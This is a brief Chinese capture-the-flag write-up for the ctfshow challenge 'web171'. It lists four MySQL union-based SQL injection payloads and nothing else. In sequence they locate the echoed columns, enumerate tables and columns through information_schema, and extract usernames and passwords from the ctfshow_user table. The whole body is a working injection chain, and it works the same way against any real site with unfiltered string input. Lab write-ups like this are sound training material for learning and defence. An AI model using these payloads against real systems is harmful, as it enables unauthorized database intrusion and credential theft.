web171(联合查询)

浏览 79 扫码分享 2023-11-26 11:18:01

没有过滤，最基础的联合查询爆数据，这里只写payload了

#判断回显位
-1' union select 1,2,3--+
#爆表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()--+
#爆列
-1'  union select group_concat(column_name),2,3 from information_schema.columns where table_name='ctfshow_user'--+
#爆数据
-1'  union select id,username,password from ctfshow_user--+

若有收获，就点个赞吧

让时间为你证明